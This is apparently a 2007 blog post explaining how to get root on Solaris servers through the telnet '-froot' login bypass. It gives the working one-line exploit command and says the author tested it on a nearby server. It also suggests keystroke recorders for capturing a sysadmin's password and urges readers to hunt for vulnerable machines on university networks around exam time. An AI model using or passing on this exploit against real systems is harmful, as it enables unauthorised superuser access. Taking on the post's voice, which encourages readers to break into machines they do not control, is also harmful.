Feed on
Posts
Comments
« Making a Flickr Killer With TurboGears - Part 1: Introduction To TurboGears
Making a Flickr Killer With TurboGears - Part 2: A Flickr Clone in 37 Minutes Flat »

How to Gain Root Access on SunOS (a 1-day exploit)

Feb 12th, 2007 by thesamet

If you happen to find a Sun Solaris server with a telnet daemon running, it is very likely that you can get superuser access on it by just typing:

$ telnet -l "-froot" server

where server is the server name. I was able to confirm this on a Solaris server nearby.

It’s amazing to see that this one was overlooked for SO much time, and how using this exploit does not require any skill whatsoever. If root logins through telnet are disabled, you may still be able to login as any other user (think sysadmin’s user account + keystroke recorder)

While the telnet port is usually blocked to servers on the internet, it is quite common that it is left open inside local networks, and especially in universities. So go ahead and look for Solaris rootkits — the exam period is just over the corner :)

Source: Errata Security blog.

Posted in howto, linux, unix

RSS feed | Trackback URI

Comments »

No comments yet.

Name (required)
E-mail (required - never shown publicly)
URI
How much is two plus four? (required, to check if you are human)
Subscribe to comments via email
Your Comment (smaller size | larger size)
You may use <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong> in your comment.